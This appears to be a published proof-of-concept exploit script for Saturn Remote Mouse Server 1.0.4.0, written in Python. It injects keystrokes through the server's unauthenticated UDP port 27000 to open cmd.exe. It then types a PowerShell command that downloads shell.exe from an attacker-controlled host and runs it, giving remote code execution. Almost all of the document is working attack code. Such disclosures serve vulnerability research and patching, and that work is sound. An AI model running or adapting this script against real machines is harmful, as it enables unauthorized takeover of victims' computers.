# Exploit Title: Saturn Remote Mouse Server 1.0.4.0 - Remote Code Execution
# Date: 27/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.saturnremote.com/
# Software Link:
https://apps.microsoft.com/detail/9pcrbt6tm5v8?hl=en-US&gl=EN
# Version: 1.0.4.0
# Tested on: Windows 10

'''
Description:

Saturn Remote Mouse Server v1.0.4.0 exposes an unauthenticated UDP command
interface (port 27000) allowing remote attackers to inject keystrokes. This
PoC demonstrates RCE by simulating Windows key combinations to spawn
cmd.exe and execute malicious PowerShell payloads with user privileges.
'''

import socket
import json
import time

TARGET_IP = "192.168.8.105"
TARGET_PORT = 27000
LHOST = "192.168.8.100"
PAYLOAD = "shell.exe"

def send_keystroke(key):

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(json.dumps({"Key": key}).encode(), (TARGET_IP, TARGET_PORT))
    sock.close()
    time.sleep(0.15)

def open_start_menu():

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    start_cmd = {
        "X": 0,
        "CommandName": "START",
        "AreaHeight": 0,
        "Y": 0,
        "AreaWidth": 0
    }
    sock.sendto(json.dumps(start_cmd).encode(), (TARGET_IP, TARGET_PORT))
    sock.close()
    time.sleep(1)

def type_string(text):

    for char in text:
        send_keystroke(char)


open_start_menu()
time.sleep(2)
type_string("cmd")
time.sleep(1)
send_keystroke("\n")
time.sleep(2)


download_cmd = f"powershell -c \"iwr http://{LHOST}/{PAYLOAD} -OutFile
$env:TEMP\\{PAYLOAD}; Start-Process $env:TEMP\\{PAYLOAD}\""
type_string(download_cmd)
time.sleep(1)
send_keystroke("\n")  # Execute
print("payload executed check your listener!")

time.sleep(3)
type_string("exit")
send_keystroke("\n")